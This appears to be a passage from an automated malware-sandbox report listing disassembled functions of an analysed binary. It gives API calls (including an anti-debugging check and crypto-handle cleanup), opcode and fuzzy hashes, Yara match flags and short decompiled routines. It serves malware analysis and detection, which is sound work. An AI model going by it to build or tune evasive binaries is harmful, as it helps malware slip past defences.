                                                                                                                                                    • Opcode ID: acb7aab04d1b70b94222928ad93017452ceff359bd5f802487bbc7fa3e3b501f
                                                                                                                                                    • Instruction ID: e342c9e4526fb684cf0b26326ebb3bb06d2e961c3eeab3272fbd3c23016c5a6c
                                                                                                                                                    • Opcode Fuzzy Hash: acb7aab04d1b70b94222928ad93017452ceff359bd5f802487bbc7fa3e3b501f
                                                                                                                                                    • Instruction Fuzzy Hash: 57419574E00219EFDB04CF98C894AEDBBB2FF48305F248599D916AB354D734AA81CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0062B4CC, Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0062B5EB,0068BAB0,00000017), ref: 0062B4D1
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0068BAB0,?,0062B5EB,0068BAB0,00000017), ref: 0062B4DA
                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,0062B5EB,0068BAB0,00000017), ref: 0062B4E5
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0062B5EB,0068BAB0,00000017), ref: 0062B4EC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                    • Opcode ID: 880620e61c25cd2dd7c41ad549c753f7d7b78a0ef679b980c5d0656c23145416
                                                                                                                                                    • Instruction ID: 31ec9704323a8658630816dfb9eff7ec8e6df4f343abb3d780a53aa3940789ed
                                                                                                                                                    • Opcode Fuzzy Hash: 880620e61c25cd2dd7c41ad549c753f7d7b78a0ef679b980c5d0656c23145416
                                                                                                                                                    • Instruction Fuzzy Hash: 9FD0123204020AFFEF002BE0FC0CA483F2AEB08612FC06200F38AA7020CF3144068B61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C1F6, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650ADD
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650B13
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C24A
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C294
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C35A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale$ErrorLast_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3140898709-0
                                                                                                                                                    • Opcode ID: 7747aa329ca15833cc0c89e6053598f712610de4895567d34ec8b8989a34508a
                                                                                                                                                    • Instruction ID: e855a9a76c877c9481584f81a85cfea54e729988add3235da07af56b2d865028
                                                                                                                                                    • Opcode Fuzzy Hash: 7747aa329ca15833cc0c89e6053598f712610de4895567d34ec8b8989a34508a
                                                                                                                                                    • Instruction Fuzzy Hash: 0761937191031B9FDB689F28CC92BBA77EAEF04322F508169ED05C6281E734DD89CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065838E, Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00658429
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006584A7
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 006584E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                                    • Opcode ID: 2bffaac79343f15a9ab4d8fc7bf4e3267e869b5fc8da6a47bbedb9307f8d6cec
                                                                                                                                                    • Instruction ID: 704792828fc56d162407d0aea7ccb6557ad49ef95f69a08547ef501d280af1ea
                                                                                                                                                    • Opcode Fuzzy Hash: 2bffaac79343f15a9ab4d8fc7bf4e3267e869b5fc8da6a47bbedb9307f8d6cec
                                                                                                                                                    • Instruction Fuzzy Hash: 2B41B871900116AFDB30EF65CC49DBBB7BAEB85706F044199ED05A3681EE309E88CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00636D21, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00636E19
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00636E23
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00636E30
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                    • Opcode ID: fa7006ec91fa0a40d92bda836df80074fb377d0368ec52df9727d5c63540d4ec
                                                                                                                                                    • Instruction ID: 1ad648fa553b0912a6dc83c8a7dee00fb57a538c90bdc776c773a5d825082f3a
                                                                                                                                                    • Opcode Fuzzy Hash: fa7006ec91fa0a40d92bda836df80074fb377d0368ec52df9727d5c63540d4ec
                                                                                                                                                    • Instruction Fuzzy Hash: 2C31C474901229ABCB61DF68DC89BCDBBB9BF08310F5051DAE41CA7250EB709F858F44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612CF7, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00612CF7() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                                                                                                                    0x00612d84
                                                                                                                                                    0x00612d8a
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d9b
                                                                                                                                                    0x00612da1
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612db2
                                                                                                                                                    0x00612dba
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dcd

                                                                                                                                                    APIs
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3577760690-0
                                                                                                                                                    • Opcode ID: b6c80625d92adb0ee14e4f37979bb7ed13241bd55bfa726f791cfefd2bae1b66
                                                                                                                                                    • Instruction ID: b629278bbab49c6bdd0f8602fc49e1292fd7fb3e78111f24a0b6e6432b3049ec
                                                                                                                                                    • Opcode Fuzzy Hash: b6c80625d92adb0ee14e4f37979bb7ed13241bd55bfa726f791cfefd2bae1b66
                                                                                                                                                    • Instruction Fuzzy Hash: 10F0F8B4D00209EBDB24CF90E858BEDBBB5AF08306F188099E50163390C7784A94DF10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612D78, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00612D78() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                                                                                                                    0x00612d84
                                                                                                                                                    0x00612d8a
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d9b
                                                                                                                                                    0x00612da1
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612db2
                                                                                                                                                    0x00612dba
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dcd

                                                                                                                                                    APIs
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3577760690-0
                                                                                                                                                    • Opcode ID: 0771f550421d8bd640e2a731c7427fb00051941138e3d65aaba0c363d3c7b78e
                                                                                                                                                    • Instruction ID: b629278bbab49c6bdd0f8602fc49e1292fd7fb3e78111f24a0b6e6432b3049ec
                                                                                                                                                    • Opcode Fuzzy Hash: 0771f550421d8bd640e2a731c7427fb00051941138e3d65aaba0c363d3c7b78e
                                                                                                                                                    • Instruction Fuzzy Hash: 10F0F8B4D00209EBDB24CF90E858BEDBBB5AF08306F188099E50163390C7784A94DF10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612D58, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00612D58() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                                                                                                                    0x00612d84
                                                                                                                                                    0x00612d8a
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d9b
                                                                                                                                                    0x00612da1
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612db2
                                                                                                                                                    0x00612dba
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dcd

                                                                                                                                                    APIs
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3577760690-0
                                                                                                                                                    • Opcode ID: af18eae77c1752f66cdc5b4964583458d2cd48d657321ac8168fe8777b491da5
                                                                                                                                                    • Instruction ID: b629278bbab49c6bdd0f8602fc49e1292fd7fb3e78111f24a0b6e6432b3049ec
                                                                                                                                                    • Opcode Fuzzy Hash: af18eae77c1752f66cdc5b4964583458d2cd48d657321ac8168fe8777b491da5
                                                                                                                                                    • Instruction Fuzzy Hash: 10F0F8B4D00209EBDB24CF90E858BEDBBB5AF08306F188099E50163390C7784A94DF10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612D35, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00612D35() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                                                                                                                    0x00612d84
                                                                                                                                                    0x00612d8a
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d9b
                                                                                                                                                    0x00612da1
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612db2
                                                                                                                                                    0x00612dba
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dcd

                                                                                                                                                    APIs
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3577760690-0
                                                                                                                                                    • Opcode ID: 77dac7a7b23e7df0a42eca03b8cd075734f7540ae4325d8b92a56d20d53a68fb
                                                                                                                                                    • Instruction ID: b629278bbab49c6bdd0f8602fc49e1292fd7fb3e78111f24a0b6e6432b3049ec
                                                                                                                                                    • Opcode Fuzzy Hash: 77dac7a7b23e7df0a42eca03b8cd075734f7540ae4325d8b92a56d20d53a68fb
                                                                                                                                                    • Instruction Fuzzy Hash: 10F0F8B4D00209EBDB24CF90E858BEDBBB5AF08306F188099E50163390C7784A94DF10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064C285, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0064C284,?,?,?,?), ref: 0064C2A7
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0064C284,?,?,?,?), ref: 0064C2AE
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0064C2C0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                    • Opcode ID: 6328db583ea9a4bca300975e753d589039eae1c71bdf6ff5064c8fed501fcd6b
                                                                                                                                                    • Instruction ID: 47318e37608b1736a2ffdfa92e82827bbf629fa2ab4a94605e8cf2f5c69a5893
                                                                                                                                                    • Opcode Fuzzy Hash: 6328db583ea9a4bca300975e753d589039eae1c71bdf6ff5064c8fed501fcd6b
                                                                                                                                                    • Instruction Fuzzy Hash: EDE04631001608BFCF916FA4DD4D9893B2AEB04351B400415F9449A231CFB5DE82CB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00657FD2, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e7ead4cf358bea9d82b4c33f30c55f7c772222c42089f8a0747d4145020afffd
                                                                                                                                                    • Instruction ID: 947fbb6e26e75c46940a946afdac2776bff27787c2688e2be48cbf2de3eee89f
                                                                                                                                                    • Opcode Fuzzy Hash: e7ead4cf358bea9d82b4c33f30c55f7c772222c42089f8a0747d4145020afffd
                                                                                                                                                    • Instruction Fuzzy Hash: 4851C6B5804219AFDB24DF78CC85AEAB7BAEF45301F14429DE819E3241EA319E498F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C449, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650ADD
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650B13
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C49D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_free$InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2003897158-0
                                                                                                                                                    • Opcode ID: 03d9f69e54b4702c9a111c8e07d7bb59bd571ece82e4eb485b997d66e2f426db
                                                                                                                                                    • Instruction ID: c54570ff7f6b5fa08cd73615b9bcc0d7c774d9b97183acb8618a2dfe93d8bb06
                                                                                                                                                    • Opcode Fuzzy Hash: 03d9f69e54b4702c9a111c8e07d7bb59bd571ece82e4eb485b997d66e2f426db
                                                                                                                                                    • Instruction Fuzzy Hash: E621A471510206AFEF189A64DC42ABA73AAEF44326F10407EFD06D6241EA74ED18CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C0D0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0065C1F6,00000001,00000000,?,-00000050,?,0065C824,00000000,?,?,?,00000055,?), ref: 0065C142
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: aacfbf4a627b4b936f07d74e5586264845b013b0ae0f42291045aa7ee0bb9288
                                                                                                                                                    • Instruction ID: a84a56d53759af46f554b7564a00c0183eef03001e62b5f25600a548121b3298
                                                                                                                                                    • Opcode Fuzzy Hash: aacfbf4a627b4b936f07d74e5586264845b013b0ae0f42291045aa7ee0bb9288
                                                                                                                                                    • Instruction Fuzzy Hash: CD11E937200B019FDB289F39C8915BAB792FF84769F15442DED4787B41E771A946C740
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00657943, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0065794A
                                                                                                                                                      • Part of subcall function 00663322: __cftoe.LIBCMT ref: 00663369
                                                                                                                                                      • Part of subcall function 00663322: OutputDebugStringW.KERNEL32(00000000,?,?,?,?), ref: 00663378
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DebugDebuggerOutputPresentString__cftoe
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3697724916-0
                                                                                                                                                    • Opcode ID: ce9fa62fbd23e71e577159ed3953ffbf867d48fd20fe4b7894595ef7f1418490
                                                                                                                                                    • Instruction ID: bc7c2bac3631047d8fd72e9297a12ae95f87eae26dcade42befb82572a023ac3
                                                                                                                                                    • Opcode Fuzzy Hash: ce9fa62fbd23e71e577159ed3953ffbf867d48fd20fe4b7894595ef7f1418490
                                                                                                                                                    • Instruction Fuzzy Hash: 50F0A431409166BADF602E61AC52FEE371BAF437A3F180405FD48D6241CA21D91996FA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C675, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0065C412,00000000,00000000,?), ref: 0065C6A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                    • Opcode ID: de2009386a1cffdb683d68afba35c6464a7cefcd6e13087995c1df02e66d8e44
                                                                                                                                                    • Instruction ID: 7168756467ecb3dc5fe5d0d30eb490cdc66079d7678445616b05d06c07a746fa
                                                                                                                                                    • Opcode Fuzzy Hash: de2009386a1cffdb683d68afba35c6464a7cefcd6e13087995c1df02e66d8e44
                                                                                                                                                    • Instruction Fuzzy Hash: F0F0F972650312BFDB246620CC497FA7759EB40776F244428ED06A3240EA74FF05C6E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C16B, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0065C449,00000001,00000000,?,-00000050,?,0065C7E8,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0065C1B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 38ce4c3651ef46be11f02d5ad705aab363cf0fd90eea754cac68112730adc5c1
                                                                                                                                                    • Instruction ID: b7231753b468a45f400f7ef0b38bcaa0147302344bd4f0d4506a163b6e8d30ee
                                                                                                                                                    • Opcode Fuzzy Hash: 38ce4c3651ef46be11f02d5ad705aab363cf0fd90eea754cac68112730adc5c1
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF046322007046FDB245F39DCC1ABA7B92EF80379F05842CFD464B682C6B19C06C740
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00651499, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00637349: RtlEnterCriticalSection.NTDLL(?), ref: 00637358
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0065148C,00000001,006A7100,0000000C,00651D2D,00000000), ref: 006514D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                    • Opcode ID: 76a9eda01183249ac21a721d4cdc8c777190591cd60ebd30187a8addd71182af
                                                                                                                                                    • Instruction ID: 55341bdcba866e19d23edaafa3919dec4ff2960c45f431f7e8d5f292be1c0d9c
                                                                                                                                                    • Opcode Fuzzy Hash: 76a9eda01183249ac21a721d4cdc8c777190591cd60ebd30187a8addd71182af
